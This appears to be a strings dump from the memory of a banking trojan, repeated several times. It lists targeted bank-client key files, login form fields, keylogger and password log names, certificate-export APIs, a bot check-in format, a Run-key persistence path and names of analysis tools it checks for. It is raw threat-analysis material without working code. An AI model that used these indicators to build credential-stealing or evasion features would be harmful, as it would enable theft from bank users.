prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\rkousid.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

`.data

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_580_rwx_00B60000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_580_rwx_00C30000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_648_rwx_00200000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_648_rwx_00A20000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

